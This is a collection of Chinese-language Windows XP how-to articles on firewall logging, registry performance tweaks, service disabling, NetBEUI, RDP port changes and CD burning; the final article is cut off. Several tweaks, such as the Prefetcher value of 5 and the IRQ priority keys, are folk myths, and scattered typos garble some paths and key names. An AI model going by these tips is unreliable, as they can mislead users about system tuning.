    ICF被视为状态防火墙，状态防火墙可监视通过其路径的所有通讯，并且检查所处理的每个消息的源和目标地址。为了防止来自连接公用端的未经请求的通信进入专用端，ICF保留了所有源自ICF计算机的通讯表。在单独的计算机中，ICF将跟踪源自该计算机的通信。与ICS一起使用时，ICF将跟踪所有源自ICF/ICS计算机的通信和所有源自专用网络计算机的通信。所有Internet传入通信都会针对于该表中的各项进行比较。只有当表中有匹配项时（这说明通讯交换是从计算机或专用网络内部开始的），才允许将传入Internet通信传送给网络中的计算机。

    源自外部源ICF计算机的通讯（如Internet）将被防火墙阻止，除非在“服务”选项卡上设置允许该通讯通过。ICF不会向你发送活动通知，而是静态地阻止未经请求的通讯，防止像端口扫描这样的常见黑客袭击。

    二、注意事项

    ICF和家庭或小型办公室通讯——不应该在所有没有直接连接到Internet的连接上启用Internet连接防火墙。如果在ICS客户计算机的网络适配器上启用防火墙，则它将干扰该计算机和网络上的所有其他计算机之间的某些通讯。如果网络已经具有防火墙或代理服务器，则不需要Internet连接防火墙。

    ICF和通知消息——由于ICF检查所有传入通讯，而某些程序（尤其是电子邮件程序）可能在启用ICF时做出不同动作。如定期查询新邮件、等待电子邮件服务器的通知等。

    高级ICF设置——ICF安全记录功能可以提供一种方式来创建防火墙活动的日志文件。ICF能够记录被许可的和被拒绝的通信。例如，默认情况下，防火墙不允许来自Internet的传入回显请求通过。如果没有启用Internet控制消息协议（ICMP）“允许传入的回显请求”，那么传入请求将失败，并生成传入失败的日志项。

三、实战防火墙

    1.启用或禁用Internet连接防火墙

    打开“网络连接”，

    单击要保护的拨号、LAN或高速Internet连接，然后在“网络任务”→“更改该连接的设置”→“高级”→“Internet 连接防火墙”下，选择下面的一项：

    若要启用Internet连接防火墙，选中“通过限制或阻止来自Internet的对此计算机的访问来保护我的计算机和网络”复选框。若要禁用Internet连接防火墙，请清除此复选框。

    2.安全日志文件

    使用ICF安全日志，你可以：

    登录放弃的数据包——这将登录来源于家庭、小型办公网络或Internet的所有放弃的数据包。

    当你选择“登录放弃的数据包”复选框时，每次通信尝试通过防火墙却被检测和拒绝的信息都被ICF收集。例如，如果你的Internet控制消息协议没有设置成允许传入的回显请求，如Ping和Tracert命令发出的请求，则将接收到来自网络外的回显请求，回显请求将被放弃，然后日志中将生成一条项目。

    登录成功的连接——这将登录来源于家庭、小型办公网络或Internet的所有成功的连接。

    当你选择“登录成功的外传连接”复选框时，将收集每个成功通过防火墙的连接信息。例如，当网络上的任何人使用Internet Explorer成功实现与某个网站的连接时，日志中将生成一条项目。

    生成安全日志时使用的格式是W3C扩展日志文件格式，这与在常用日志分析工具中使用的格式类似。

    3.启用或禁用安全日志记录选项

    打开“网络连接”，单击要在其上启用Internet连接防火墙（ICF）的连接，然后在“网络任务”→“更改该连接的设置”→“高级”→“设置”→“安全日志记录”→“记录选项”下，选择下面的一项或两项：

    若要启用对不成功的入站连接尝试的记录，请选中“记录丢弃的数据包”复选框，否则禁用。
4.更改安全日志文件的路径和文件名

    打开“网络连接”，选择要在其上启用Internet连接防火墙的连接，然后在“网络任务”→“更改该连接的设置”→“高级”→“设置”→“安全日志记录”→“日志文件选项”→“浏览”中，浏览要放置日志文件的位置。

    在“文件名”中，键入新的日志文件名，然后单击“打开”。打开后可查看其内容。

    5.更改安全日志文件大小

    打开已启用Internet连接防火墙的连接，然后在“网络任务”→“更改该连接的设置”→“高级”→“设置”→“安全日志记录”→“日志文件选项”→“大小限制”中，使用箭头按钮调整大小限制。

    6.还原默认的安全日志设置

    打开启用Internet连接防火墙的连接，然后点击“网络任务”→“更改该连接的设置”→“高级”→“设置”→“安全日志记录”→“还原默认值”。

    四、了解Internet控制消息协议（ICMP）

    “网际消息协议（ICMP）”是所需的TCP/IP标准，通过ICMP，使用IP通讯的主机和路由器可以报告错误并交换受限控制和状态信息。

在下列情况中，通常自动发送ICM消息：

    IP数据报无法访问目标。
    IP路由器（网关）无法按当前的传输速率转发数据报。
    IP路由器将发送主机重定向为使用更好的到达目标的路由。

    启用或禁用Internet控制消息协议：

    打开“网络连接”。 单击已启用Internet连接防火墙的连接，然后在“网络任务”→“更改该连接的设置”→单击“高级”→“设置”→“ICMP”选项卡上，选中希望你的计算机响应的请求信息类型旁边的复选框。


全面优化Windows XP(二)

《一键清理系统垃圾》

全面优化Windows XP(二)

7、　删除共享文档：

默认情况下，在Windows XP中打开我的电脑，会看到在硬盘图标上方有一些文件夹。这些就是“共享文件夹”，这里有每一个用来户共享文件所用的文件夹。这些文件夹特别烦人，毫无必要。我们可以让这些文件夹在我的电脑中消失：

打开注册表编辑器，把HKEY_LOCAL_MACHINE＼SOFTWARE＼Microsoft＼Windows＼CurrentVersion＼Explorer＼MyComputer＼NameSpace＼DelegateFolders下的

{59031a47-3f72-44a7-89c5-5595fe6b30ee}删掉，下次打开我的电脑，这些烦人的文件夹就不复存在了。

8、　加快Windows XP的启动：

(1)Windows XP自带了一个名为Prefetcher的服务，这个服务管理着Windows启动时的程序初始（即启动时滚动的蓝条），其中指定的程序可以在以后使用中快速载入。Prefetcher在默认情况下就是打开的，不过它的性能还可以进一步提升。打开注册表编辑器，在注册表中找到：

HKEY_LOCAL_MACHINE＼SYSTEM＼CurrentControlSet＼Control＼SessionManager＼MemoryManagement＼PrefetchParameters，其中有一个键值名为EnablePrefetcher，多数情况下它的值是3。推荐设置值是5——在我的机子上，设为5的时候工作状态最佳。可以随便试试不同的数值，直到找到最适合自己机子的值为止。也可以把Prefetcher禁用掉，只需把值设为0就可以了。不过，除非是为了测试用途，一般人都不会傻到把它设为0。

(2)"我的电脑"->"属性"->"高级"->"启动和故障修复"中，点"错误报告"，选择"禁用错误汇报"、"但在发生严重错误时通知我"。
(3)去掉"将事件写入系统日志"，"发送管理警报"，"自动重新启动"选项;将"写入调试信息"设置为"无"。

(4)点击"编辑"，在弹出记事本文件中：
    [Operating Systems]
    timeout=30　//把缺省时间 30 秒改为 0 秒
    multi(0)disk(0)rdisk(0)partition(1)＼WINDOWS="Microsoft Windows XP　Professional" /fastdetect　//把缺省 fastdetect 改为 nodetect
    注册表修改方法:"HKEY_LOCAL_MACHINE＼SYSTEM＼ControlSet001＼Control" ，SystemStartOptions键值改为NODETECT。

9、　加快Windows XP的重启和关机：

按下CTRL+ALT+DELETE打开Windows 任务管理器，然后选择关机（U），先按下CTRL，再按下关闭（U）或重新启动（R），就可以快速地关机或重启。

10、关闭计算机时自动结束任务：

在关机的时候，有时会弹出讨厌的对话框，提醒某个程序仍在运行，是否结束任务。其实完全可以通过一点点修改让Windows自动结束这些仍在运行的程序。在注册表中打开HKEY_CURRENT_USER＼Control Panel＼Desktop 目录，把里面的AugoEndTasks键值改为1
注：可能会找不到AutoEndTasks键值，如果是这样的话，自己建一个串值并把它改为这个名字，值设为1就可以了。

11、优化程序运行：

程序运行有他们各自的优先次序，所有程序都要占用处理器资源，处理器处理任务有一个先后次序，一般的计算机中有31个优先等级，系统的内核占据了最高的一些等级，这样就能保证系统的稳定，而普通的应用程序一般在比较后面的等级。在普通应用程序中间也有优先次序，他们本来在处理器面前是人人平等的，但还是有些细微的差别，前台的程序（当前正在使用）的优先级要比后台的程序高。你可以自己调节应用程序的优先级，打开任务管理器，点到“进程”选项卡，选一个应用程序的进程，点击右键，会弹出一个快捷菜单，选择“设置优先级”，这里有6个等级：实时，高，高与标准，标准，低于标准，低。你可以让你的程序强行调度到更高或更低（自然为别的程序腾出了资源）的等级。如果你不知道某个应用程序的具体进程，可以如下操作：点到“应用程序”选项卡，右键点中一个任务，选择“转到进程”，就会转到该程序的进程，这样你就找到了该程序的进程了。

12、优化“启动和故障恢复”设置：

如果在你的系统崩溃时发现你的硬盘使劲儿的响，那是因为Windows XP正在写DUMP文件呢，对我们来说，如果你不打算把这个文件寄给微软(浪费电话费)，那么它又有什么用呢？所以我的建议是关闭。右键单击“我的电脑”，点击属性，点击“高级”，在“启动和故障恢复”一栏中，点击“设置”，其中的“系统失败”一栏中，只选择“自动重新启动”，写入调试信息选择“无”。

13、禁用“错误汇报”功能：

这个功能可以在你的Windows XP发生错误的时候，系统自动收集一些错误资料然后发送给微软公司，以便其完善他们的操作系统(又一个浪费电话费且没用的功能)，建议关掉它。如果这个功能对你没有用，那又何必让它占用着你的内存呢？右键单击“我的电脑”，点击属性，点击“高级”→“错误汇报”，选择“禁用错误汇报”功能。

14、关闭“Internet时间同步”功能：

如果启用了同步，你的计算机时钟每周就会和 Internet 时间服务器进行一次同步，建议关掉它(一个没多大用的功能)。请依次单击“开始”→“控制面板”→“日期、时间、语言和区域选项”，然后单击“日期和时间”→“Internet时间”。

15、关闭华医生Dr.Watson：

在"开始"->"运行"中输入"drwtsn32"命令，或者"开始"->"程序"->"附件"->"系统工具"->"系统信息"->"工具"->"Dr Watson"，调出系统里的华医生Dr.Watson ，只保留"转储全部线程上下文"选项，否则一旦程序出错，硬盘会读很久，并占用大量空间。如以前有此情况，请查找user.dmp文件，删除后可节省几十MB空间。

16、设置IDE设备的DMA模式：

出于某些原因，Windows XP有时会在IDE通道上使用PIO并行输入输出传输模式，而不是DMA模式。如果有这种情况，用户可以手动把IDE通道改为DMA模式，这样可以减少该设备占用的CPU周期。打开设备管理器（右键点击我的电脑，选属性，点选硬件选项卡，点击“设备管理器”打开），然后点击展开“IDE ATA/ATAPI 控制器”分支，双击“Primary IDE Channel”，点击高级设置。检查“传输模式”下拉菜单，把它们全部设为DMA If Available（允许情况下使用DMA），点击确定。再用同样的方式修改每一个IDE控制器。

17、取消对zip文件的支持：

这是一个相当好的优化，Windows XP内置了对.ZIP文件的支持，我们可以把zip文件当成文件夹浏览。不过，系统要使用部分资源来实现这一功能，因此禁用这一功能可以提升系统性能。实现方法非常简单，只需取消zipfldr.dll的注册就可以了，点击开始—>运行，敲入：regsvr32 /u zipfldr.dll 然后回车即可。

18、关掉快速切换功能：

Win XP的一个很引人注目的功能叫做“快速切换”，这个功能为许多人在同一时间使用电脑提供了可能，但是要注意每一项功能总是伴随着资源的损失，如果你的内存少与64M，Win XP在装的时候就被自动禁止掉了，因为这样会使本来就已捉襟见肘的内存的压力更加大，对128M的用户来说，开这个功能虽然没什么关系，但是你又不是很需要这项功能，所以建议把这个功能给关掉。方法如下：控制面板-->用户帐户，点击“更改用户登陆或注销方式”，去掉“使用快速用户切换”就可以了。

19、为IRQ中断请求排优先次序：

这是一项非常有效的优化。计算机的每一个主要部件都设了个IRQ中断号。这里就是要通过修改每个IRQ请求的优先次序达到优化目的。这里主要的优化对象是系统/CMOS实时钟，它通过主板来提升性能。首先，要确定你想要哪个组件获得更高的性能，然后找到这个硬件正在使用的IRQ中断号。怎么找呢？打开控制面板里的系统属性（也可以按键盘上的Windows+Break热键组合打开它）。选中“硬件”选项卡，然后点击“设备管理器”按钮。右键点击要查IRQ号的组件，选择“属性”，然后点击“资源”选项卡。 这里可以看到设备正在使用的IRQ中断号（如果没有IRQ中断号，选择另一个设备）。把中断号记下来，然后运行注册表编辑器regedit，找到注册表中的HKEY_LOCAL_MACHINE＼System＼CurrentControlSet＼Control＼PriorityControl 位置。我们要在这里建立一个名为IRQ#Priority（其中“#”是具体的IRQ中断号）的DWORD双字节值，然后把它的值设为1。譬如说，我的系统CMOS实时钟的IRQ中断号是8，我要建立的键名就是IRQ8Priority。重新启动计算机之后，就会发现刚优化过的组件性能有所提高。笔者强烈建议用这个方法优化系统CMOS实时钟，因为它能改善整块主板的性能。当然也可以把多个IRQ中断号优先级提高，但这样做的效果没那么好，而且有可能造成系统不稳定。要把这个优化设置撤消的话，只要把刚才建立的注册表键值删掉就OK了。


全面优化Windows XP(一)

《一键清理系统垃圾》

全面优化Windows XP(一)

全面优化Windows XP

1、　缩短等待时间

打开注册表编辑器，找到 HKEY_LOCAL_MACHINE＼System＼CurrentControlSet＼Control，将 WaitToKillServiceTimeout 设为：1000或更小（原设定值：20000）。

找到 HKEY_CURRENT_USER＼Control Panel＼Desktop 键，将右边窗口的 WaitToKillAppTimeout 改为 1000（原设定值：20000），即关闭程序时仅等待1秒。将 HungAppTimeout 值改为：200（原设定值：5000），表示程序出错时等待0.5秒。

2、　让系统自动关闭停止响应的程序

打开注册表 HKEY_CURRENT_USER＼Control Panel＼Desktop 键，将 AutoEndTasks 值设为 1（原设定值：0）。

3、　加快菜单显示速度

打开注册表编辑器，找到 HKEY_CURRENT_USER＼Control Panel＼Desktop，将其下的 MenuShowDelay 项改为：0，你的菜单将会出乎意料地快。

4、　加速共享查看

打开注册表编辑器，把HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼Explorer＼RemoteComputer＼NameSpace下的

{D6277990-4C6A-11CF-8D87-00AA0060F5BF} 删掉

5、　加快窗口显示速度：

打开注册表编辑器，找到HKEY_CURRENT_USER＼Control Panel＼Desktop＼WindowMetrics子键分支，在右边的窗口中找到MinAniMate键值，其类型为REG_SZ，默认情况下此健值的值为1，表示打开窗口显示的动画，把它改为0，则禁止动画的显示，接下来从开始菜单中选择“注销”命令，激活刚才所作的修改即可。

6、　关掉不必要的服务：

如果你只是在单机使用WindowsXP，那么很多服务组件是根本不需要的，额外的服务程序大大拖慢了系统的速度，完全可以将这些多余的服务组件禁用。

下面我们就来看一下怎样关掉不必要的服务。单击“开始”→“设置”→“控制面板”。双击“管理工具”→“服务”，打开后将看到服务列表，有些服务已经启动，有些则没有。右键单击要配置的服务，然后单击“属性”。在“常规”选项卡上选择“自动”、“手动”或“禁用”，其中“自动”表示每次系统启动时，Windows XP都自动启动该服务；“手动”表示WindowsXP不会自动启动该服务，而是在你需要该服务时手动启动该服务；而“禁用”则表示不允许启动该服务。在实际配置时，选择“手动”或者“禁用”都可以实现关闭该服务的目的，推荐使用手动功能，这样你随时可以启动一些临时需要的服务。有些服务是WindowsXP所必需的，不能关闭，否则将会造成系统崩溃。至于各项服务的功能，我们可以通过双击该服务或将鼠标悬停在该服务名上查看。下面我们就先来看一看这些服务的说明，最后再看哪些服务可以关掉（见下表）。对于我们这些单机使用WindowsXP的普通用户来说，可以把表中服务关闭，如果你有特殊要求，可以参照表中说明自行配置Windows XP的服务，以便达到最优状态。

服务名称
如果符合下列条件，你可以将之关闭

alerter
你未连上局域网并且不需要管理警报

clipbook
你不需要查看远程剪贴簿的剪贴页面

distributed linktracking client
若不使用ntfs分区并且没有联入局域网

distributed transactioncoordinator
不需要同时处理多个数据库或者文件系统

fax service
不用windows 2000发送或者接收传真

ftp publishing service
你的计算机不做ftp服务器

iis admin service
你的计算机不做www服务器

indexing service
你的计算机不提供远程文件索引和快速访问或者没有连上局域网

internet connectionsharing
你不准备用windows2000做路由服务器，让多人共享一条线路上网

ipsec policy agent
你未连接到windows 2000的域

logical disk manageradministrative service
你不准备使用磁盘配额

message queuing
你未连接到windows 2000的域

messenger
你未连接到windows2000的域并且不需要管理警报

net logon
你不想让局域网上的其他用户登录

netmeeting remotedesktop sharing
你不想使用netmeeting远程管理计算机

network dde
你没有连入局域网

network dde dsdm
你没有连入局域网

performance logs andalerts
若不想知道计算机每一秒都干什么

qos rsvp
你没有使用依赖于qos的程序

remote access autoconnection manager
你不想在程序企图读取网络信息时自动连接到网络

remote procedure call (rpc)locator
你不需要管理rpc名称服务数据库

routing and remoteaccess
你的计算机不做路由器

runas service
你不需要在某一用户下以另外一个用户的身份执行一个程序

simple mail transportprotocol (smtp)
你的计算机不做邮件发送服务器

smart card
你没有智能卡阅读器

smart card helper
你没有旧式智能卡阅读器

snmp trap service
你没有连接到windows 2000的域

tcp/ip netbios helperservice
你的计算机不准备让别人共享

tcp/ip print server
不让你的计算机成为网络打印服务器

telnet
不想远程控制计算机执行控制台命令

uninterruptible powersupply
没使用ups或ups不支持双向传输信号

utility manager
不从一个窗口中启动和配置辅助工具

windows managementinstrumentation
你不看你的系统管理信息

world wide webpublishing service
你的计算机不做www服务器


让NetBEUI协议在Windows XP重现

《一键清理系统垃圾》

让NetBEUI协议在Windows XP重现

    在网络管理中，给机器配置恰如其分的网络协议，有时往往能改善整个网络的运行质量。NetBEUI是我们再熟悉不过的网络协议。特别是在一些中小学小型的校园网管理中，我们通常会把占用系统资源小、而效率高的NetBEUI协议作为首选，或者是配合TCP/IP协议使用。这样可以让整个网络的运行实效达到最优化。

    不知道大家有没有发现？早在Windows 9x/Me中，作为默认安装的三种协议之一的NetBEUI，由于它不支持路由，在Windows XP系统默认安装中已经不复存在了。有没有办法让它在Windows XP中重现呢？其实通过Windows XP安装盘可以轻松实现。

    方法：直接还原NetBEUI协议所需配置文件。准备一张Windows XP系统安装盘，以管理员身份（Administrator）登录。打开安装盘中的Valueadd\Msft\Net\NetBEUI文件夹，找到Nbf.sys文件并把其复制到%Systeroot%\System32\Drivers文件夹下，把Netnbf.inf复制到% Systeroot %\lnf（隐藏属性）文件夹下。

    然后，我们依次点击“开始→设置→网络连接”，打开准备配置NetBEUI协议的网卡属性窗口。在“常规”标签下，点击[安装]，在网络组件选择列表中，选择“协议”，然后再点击下面的[添加]按钮。此时在弹出的选择网络协议选择窗中会出现“NetBEUI协议”选项（如附图所示）。

    如果需要安装，此时我们只要点选“NetBEUI协议”，再点击[确定]退出即可。当然，现在我们已知NetBEUI协议所需配置文件的具体路径，也就可以在如附图所示的“选择网络协议”窗口中，直接点击右下角[从磁盘安装]按钮来完成。


让WIN XP注册表“失忆”更简单

《一键清理系统垃圾》

让WIN XP注册表“失忆”更简单

  Windows XP的注册表编辑器有了记忆功能，在打开时会自动定位到上次运行注册表时最后打开的键，这个自作聪明的功能并没有多大的意义，反而会泄露我们的秘密，可以将它禁止，在很多禁止它的方法。比如：建一个批处理文件和注册表编辑文件，然后运行批处理文件。这种方法在运行批处理文件后再运行注册表编辑器虽可以禁止记忆功能，但需要每次用注册表时都先运行批处理文件或者将批处理文件放入启动菜单，如果没有运行批处理文件，自动记忆功能又会被自动打开。还有诸如编写脚本程序等方法，实在是麻烦。
    其实，让注册表“失忆”很简单，只要将注册表编辑器定位到“HKEY_CURRENT_USE R\Software\Microsoft\Windows\CurrentVersion\Applets\Regedit”项，右键单击它，选择“权限”，在权限对话框中将完全控制和读取选项勾选为拒绝。这样注册表编辑器的记忆功能就被禁止了。不过使用这种方法将使注册表编辑器的收藏夹功能也同时被禁止，给日常编辑注册表带来不便。
    那这时可以先在“HKEY_CURRENT_US ER\Software\Microsoft\Windows\CurrentVersion\Applets”项下新建一个Favorites项，然后再按上例方法将Regedit项的权限设为拒绝。这样既可禁止注册表编辑器的记忆功能，又不会影响收藏夹的使用。
    小提示：在设置权限时，如果你有管理员权限，可以将所有用户的完全控制和读取都设为拒绝。这样无论从哪个用户登录系统，注册表编辑器的记忆功能都会被禁止了。


让XP的键盘说话！一个罕见的功能

《一键清理系统垃圾》

让XP的键盘说话！一个罕见的功能

长期面对无声的电脑，我们难免疲倦。如果正在输入的内容被系统一字(字母)不差地念出来，你还能在无声的疲倦中输入错误的内容吗？本文以Windows 2000/XP中一个鲜为人知的“讲述人”为例教你DIY一个完全的语音键盘。

    在“运行”中输入“narrator”，点“确定”，首先弹出的是一条警告信息，不予理睬，点“确定”跳过后便请出本文的主角──“讲述人”(如图)。如果你的音箱已经打开，听到了什么？不想听的话就按一下Ctrl键。再按任意键试试，你输入的字母键被系统用标准的美国英语读了出来，这时一个完全的语音键盘就诞生在你的手中了，有兴趣的朋友不妨试试。


让你的Windows XP从此变得服服帖帖

《一键清理系统垃圾》

让你的Windows XP从此变得服服帖帖

2002-02-01　　　 作者：王严刚

    “Hi，这些天你‘体验’了吗？”——如今的软件爱好者们一见面就会这样问。的确，在Windows XP中文版发布后的这几个月里，它的美丽、它的稳定、它的快速引起了不少人的注意，并为之废寝忘食，笔者也是其中“受害者”之一。在此和大家交流一些“驯服”Windows XP的心得，希望它们能够让你的Windows XP变得服服帖帖！

    驱动程序巧升级

    Windows XP中的“Windows Update”功能实在是太重要了，通过它可以得到最新的驱动程序、组件更新以及一些重要的补丁等等，我们可以通过“开始”菜单中的“Windows Update”来使用。Windows XP最近推出的一系列补丁解决了不少问题，不过中文版更新的驱动程序总是盼星星盼月亮等了好久才出来，用Windows Update上网一看吧，别人都可以看到的驱动程序在自己的机器上死活没有，英文版都有20多个补丁了，而中文版的Update里面却空空荡荡……怎么办呢？

图1 点击左侧的“Windows Update目录”

    其实，更新也有一定的技巧哟！我们只需做一点小小的修改就可以轻松查找所有的补丁及驱动程序，具体操作步骤如下：首先打开Windows Update，此时千万不要点击“扫描以寻找更新”，而应该先点击“其他选项”中的“个性化Windows Update”，在右侧的“个性化您的Windows Update体验”中，选中“在相关主题下显示Windows Update目录的链接”，并单击右上角的“保存设置”。然后点击左侧新出现的“Windows Update目录”(如图1)，现在出现了一个以前没有的新界面，在“欢迎使用Windows Update目录”一栏中，会出现“查找Microsoft Windows操作系统的更新”和“查找硬件设备的更新”两项，现在你可以选择其中一项进入。比如选择了后一项之后，会出现如图2的界面，在这里设置好一些选项后就可以点击“搜索”获得一切需要的补丁及驱动程序了。

图2 可以看到各种驱动程序的列表

    使用IE黑名单

    当你打开一个网站就会发现也弹出另一个广告页面(没法子，人家也要赚钱要生存嘛)！可他们生存而你的电脑就受罪了，页面开多了，电脑运行速度就会大大地变慢。一些禁止弹出广告页面(俗称“黑名单”)的软件就应运而生，其实在Windows XP自带的IE6.0中也有禁用黑名单的功能，不信？Follow me！右击IE浏览器并从弹出的菜单中选择“属性”，再找到“安全”页面(如图3)，在“安全设置”中选择“受限制的站点”，并点击“站点”按钮，在弹出的窗口中输入禁止弹出广告页面的地址，再单击“添加”-“确定”。哈，怎么样，讨厌的广告不见了！

    修理IE快捷键

    说起来也奇怪，IE6.0本身是很好用的，和Windows XP配合起来也天衣无缝。可是中文版用户都遇到一个哭笑不得的麻烦。本来我们都习惯了用“Ctrl+Enter”输入“www.***.com”。比如要输入“www.microsoft.com”，只要在IE中输入“Microsoft”，再按“Ctrl+Enter”，IE就会自动添加成为“www.microsoft.com”。可是在IE6.0中就不这样了，它非常“照顾”中国用户，以为用户都是访问后缀为“.cn”的网站，就把“www.microsoft.com”变成“www.microsoft.com.cn”，虽说这个Bug不致命，但用惯IE6.0以前版本的用户使用起来感觉实在不方便，觉得微软实在有“画蛇添足”的嫌疑——而要为这事儿出个补丁的话，也不知道是猴年马月的事情了，还是自己动手吧！

图3 在IE6.0中设置广告“黑名单”

    为了安全起见，不直接修改原文件，所以首先把“C:＼windows＼system＼browselc.dll”文件复制到其他地方，然后用eXeScope(你可以从www.onlinedown.net/exescope.htm中下载)打开这个文件，找到“资源”-“字串表”下的809，找到12936(如图4)，把“12936,www.%s.co.cn”改为“12936,http://www.%s.com”。然后再次进入“C:＼windows＼system”，确定关闭了所有IE窗口，将原来的“browselc.dll”重命名成“browselc.dll-1”，再把修改好的文件Copy到原来的目录。再次打开IE，一切都搞定了。用这个方法不仅解决了以上问题，而且立竿见影，效果非常好。

图4 修改browselc.dll文件

    通过以上“训练”，相信你的Windows XP也应该懂得点“规矩”了吧。不过如果想让它完全听话，还得我们不断努力，不断挖掘，不断“训练”。


如何修改Windows XP 远程管理默认端口

《一键清理系统垃圾》

如何修改Windows XP 远程管理默认端口

    自Windows 2000开始，微软就提供一项终端服务(Terminal Server)这项服务可以将远程的桌面传递到本地。通过该服务，可视化的远程管理可以非常方便的实现。继Windows 2000之后，Windows XP也提供这项服务。在Windows XP 中的Terminal Server Client程序比Windows 2000中的那个有了进一步的发展，许多功能都强大了许多。

    Windows XP 中的Terminal Server Client程序主要的新特性有：

    1)可以将目标机器上的声音带回本机。

    2)支持真彩色并可以全屏使用。

    3)而且不用安装，只需两个文件 mstsc.exe 和 mstscax.dll 就可以使用了，非常方便。

    Terminal Server 的默认端口是 3389，所以很多了解Windows的这个特性的人利用一些特殊的软件或者其他方法来扫描该端口。发现该端口开放就可以实施入侵，这是非常危险的。所以，在实践中需要改变Terminal Server的端口。

    修改Terminal Server的默认端口的办法如下：

    1. 服务器端的修改

    将下列两个注册表键中的 PortNumber 均改成自定义的端口即可：

    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\Repwd\Tds\Tcp

    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp

    2. 客户端的修改

    Windows 2000

    运行 Client Connection Manager 创建一个对刚才修改过的服务器的新连接，然后将其导出到 server.cns 文件，.cns 文件是存储此连接各选项的 ASCII 码文件，用 文本编辑软件 打开这个文件，找到 Server Port=3389 这一行将 3389 改成自定义的端口，保存后再将其导入 Client Connection Manager 它会提示“已经有一个连接使用此配置，是否将其覆盖”， 选择是。 现在我们就可以用 Client Connection Manager 中的这个连接配置连到自定义端口的服务器了。

    Windows XP

    打开 mstsc.exe 窗口。按 “选项”按钮扩展窗口，将有 “常规”、“显示”、“本地资源”、“运行”、“高级”五个选项卡。根据需要填写各项后，再按 “常规” 选项卡中的“另存为”按钮。 mstsc.exe 会将自定义连接配置保存为 .rdp 文件。用文本编辑软件将其打开可以看到其格式如下：

    screen mode id:i:1

    desktopwidth:i:800

    desktopheight:i:600

    session bpp:i:8

    winposstr:s:2，3，195，73，843，580

    auto connect:i:0

    full address:s:192.168.0.9

    compression:i:1

    bitmapcachepersistenable:i:1

    keyboardhook:i:2

    audiomode:i:2

    redirectdrives:i:1

    redirectprinters:i:1

    redirectcomports:i:1

    displayconnectionbar:i:1

    username:s:tsinternetuser

    domain:s:JOB

    alternate shell:s:

    shell working directory:s:

    非常明显，可以看出这个文件的格式为：选项:数据类型(i-整数/s-字符串)：该选项的数据值。

    其中没有连接到服务器的某个端口的这样的选项。所以需要手工添加，在其中添加一行。

    server port:i:××××(××××服务器自定义的端口)。

    也可以将中间项省去；直接写成 server port:××××即可。

    运行mstsc.exe，打开这个.rdp 文件即可连接这个自定义端口了。


删除隐藏在Windows XP系统深处的组件

《一键清理系统垃圾》

删除隐藏在Windows XP系统深处的组件

    可能出于系统安全性的考虑，Windows XP把不少的组件隐藏了起来，即使你不使用这些应用组件，你也无法将它们从系统中删除。笔者下述的方法，可以让大家删除Windows XP这些隐藏的组件。

    第一步，显示系统文件夹和文件

    由于Windows XP默认地把系统文件隐藏起来，从而在“Windows资源管理器”窗口中看不到它们，所以我们要让这些系统文件现出“原形”，操作步骤如下:打开资源管理器窗曰，在“工具”菜单中，单击“文件夹选项”命令，系统弹出“文件夹选项”对话框，单击“查看”选项卡，选空“隐藏受保护的操作系统文件(推荐)”复选框，选中“显示所有文和文件件夹”复选钮，单击“确定”按钮。

    第二步，编辑SySOC.inf文件

    上一步骤其实是为我们修改Windows XP的系统文件做准备的，因为正是该文件让一些Windows XP的组件隐藏起来了。不过，只要我们删除该文件中所有的“hide”字符串即可让这些隐藏的组件现身，首先在“Windows资源管理器”窗口，打开Windows XP所在的系统文件夹下的1血厂子文件夹(如C:Windowsinf)，在此文件夹中找到Sysoc.inf文件，并打开。然后在打开的窗口中、单击 “编辑”菜单中的“替换”命令，系统弹出“替换”对话框，在“查找内容”框巾，键入“hide，”，确认“替换为”框中的内容为空，单击“全部替换”按钮，实际上这就是删除了该文件中所有的“hide。”字符串。最后在“文件”菜单中，依次单击“保存退出”命令。

    第三步，删除不需要的Window组

    在删除了“Sysoc·inf”文件中所有的“hide，”字符串后，再到“Windows组件向导”对话框去看看，一定会发现比原来多出了一些组件。现在你就可以删除那些不需要的组件了。

作者：
来源：天极yesky


设定Win XP关机按钮

《一键清理系统垃圾》

设定Win XP关机按钮

我的小侄子比较喜欢电脑，在我的电脑旁玩耍时经常动电脑的开关，把我好不容易打开的计算机给关闭。由此我想起了对计算机中的文件进行删除操作时，系统在删除前会出现一个确认对话框，以免我们执行误操作。在Windows XP默认的情况中，如果按下机箱上的开关，Windows XP会直接关机而不出现任何的提示对话框。能不能让计算机在关闭之前事先打个招呼，从而防止因小侄子的捣乱或我们的误操作引起系统关机呢？答案是肯定的，下面就具体介绍一下其操作步骤：
首先用鼠标在桌面的任意空白处单击右键，从快捷菜单中选“属性”命令打开“显示属性”对话框(如图1)，然后再从其对话框中选取“屏幕保护程序”标签打开屏幕保护程序页面。然后单击该对话框中的“电源(O)…”按钮打开“电源选项属性”对话框(如图2)，然后再从该对话框中选择“高级”标签打开“高级”标签页面(如图3)，然后在其对话框中的“电源按钮”域中的“在按下计算机电源按钮时(E)”后的列表框中单击下拉列表箭头，然后选择该列表框的第2项(“问我要做什么”)，单击该对话框中的“确定”或“应用”按钮即可。按下电源按钮试试……Windows XP会出现“关闭计算机”对话框(如图4)问你：“希望计算机做什么？”你可以选择“关机”，“待机”，“重新启动计算机”——OK，自己决定你的操作吧！


深入了解Windows XP的刻录功能(图)

《一键清理系统垃圾》

深入了解Windows XP的刻录功能(图)

2002-03-07　　　　　作者：

        Windows XP——微软公司斥资10亿美元打造的“超级航母”，集成了诸如文件压缩、Internet防火墙、光盘刻录、即时通信(Windows Messenger)等众多最新功能，为用户提供了更便利的使用环境。不过，令人意外的是，Windows XP自带的刻录新功能却存在着导致数据丢失的Bug。本文将针对Windows XP自带的刻录功能，以及由此延伸出来的软、硬件的问题进行分析，希望能对大家的日常使用有所帮助。

    核心技术剖析

    对于Windows XP自带的刻录功能，我们主要从两方面进行分析，一是对刻录机的正确识别问题， 二是对该功能从易用性、功能性的角度进行分析。

    一、硬件兼容性

    这主要是测试Windows XP对刻录机的正确识别问题。我们测试了两类产品，一是明基(Benq)这样的品牌产品，另一类是品牌知名度很小的产品。经测试，Windows XP均能正确识别它们，无须安装驱动程序即可正常使用。如果你的刻录机没有被正确识别，建议升级Firmware。

    二、刻录引擎

